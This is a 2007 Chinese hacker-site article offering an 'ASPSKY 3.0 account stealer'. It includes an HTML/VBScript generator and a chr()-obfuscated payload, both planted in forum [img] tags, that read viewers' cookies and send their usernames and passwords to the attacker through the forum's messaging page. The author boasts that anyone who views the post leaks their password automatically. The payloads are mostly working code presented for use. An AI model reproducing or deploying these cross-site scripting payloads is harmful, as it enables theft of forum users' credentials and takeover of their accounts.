完美的解决跨站脚本得COOKIE弹框框的问题--解决,跨站,脚本,COOKIE,弹框框,问题

[推荐]完美的解决跨站脚本得COOKIE弹框框的问题

荐 ★★★★★

完美的解决跨站脚本得COOKIE弹框框的问题

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-1-22

同时把密码用户名发到你在论坛的邮相里，爽吧

先头看到欲望之翼的self.window的办法

其实我一直有个从来没给任何人说的办法:

玩了好久了公布了呵呵:

<html>

sub changeq()

if form1.loc.value="" or form1.who.value="" then

msgbox "没有加入地址或用户名?"

exit sub

end if

loc=form1.loc.value

user=form1.who.value

str="[img]vbscript:execute("on error resume next: call document.body.insertAdjacentHTML(""beforeEnd"",""<div style=display:none><iframe id=sendmessage></iframe></div>""):call sendmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="& user & "&title=""+mid(documents.cookie,instr(lcase(documents.cookie), ""password"")+9,10)+""&message=""+""I am a good boy"",""_self"") ")[/img]" =版权所有软件下载学院版权所有=

form1.area.value=str

end sub

</script>

<body>

<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>

设置发送地址:<input type=text name=loc size=50><br>

▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录最后不用加/)<br>

发送的用户名:<input type=text name=who size=20>-------------

<input type=button name=change value=生成代码 onclick=changeq()><br>生成的代码:)<textarea name=area rows=10 cols=100></textarea>

</form>

</body>

</html>

搞了大半天的结果，偷aspsky 3.0 密码的东东把下面的代码改一改然后发到你的贴子里，只要有人看你的贴子他的密码就自动发到你的在论坛上的邮箱里了，爽吧，其实我的是用VBScript写的snwcwt用javascript写的没有双引号的问题而且可以同时写几行代码所以要实用一些！！不过效果都差不多哈：）（注意要先把下面的东东改一下发送的地址然后全部写在一行里）

[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(documents.cookie)-instr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&chr(101)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(117)+ chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(document.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(115))-1)-instr(lcase(documents.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(103)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116)&chr(104)&chr(61)&chr(49))[/img]

[1] [2] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章： 3389远程控制实用技巧

下一篇文章：学校机房禁止命令行cmd的破解

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

	抽根憋闷烟的心声
	学习网页制作的理由
	加入终身会员的理由!!!
	学习黑客编程的5大理由
	学习免杀的6大理由
	学习软件破解的理由
	会员账号开通查询
	常见问题解答
	汇款向导
	学员报名咨询

	Vista+谷歌拼音输入法重现输入法	04-06
	45种可以拿到Webshell的技巧	04-02
	0起步接触黑客--实用价值相当高	04-02
	普通文件的欺骗手法	03-21
	黑客技术-ARP欺骗	03-19
	跨站Script攻击和防范	03-19
	超级兔子+WinRAR轻松破解收费加密	03-16
	浏览器执行exe文件的探讨	03-15
	菜鸟"搜"大量Web Shell的思路	03-14
	轻松录制在线网络电视的方法	03-14
	突破单位网管封杀QQ、MSN 端口的	03-14
	菜鸟找漏洞—渗透网站的“反思”	02-06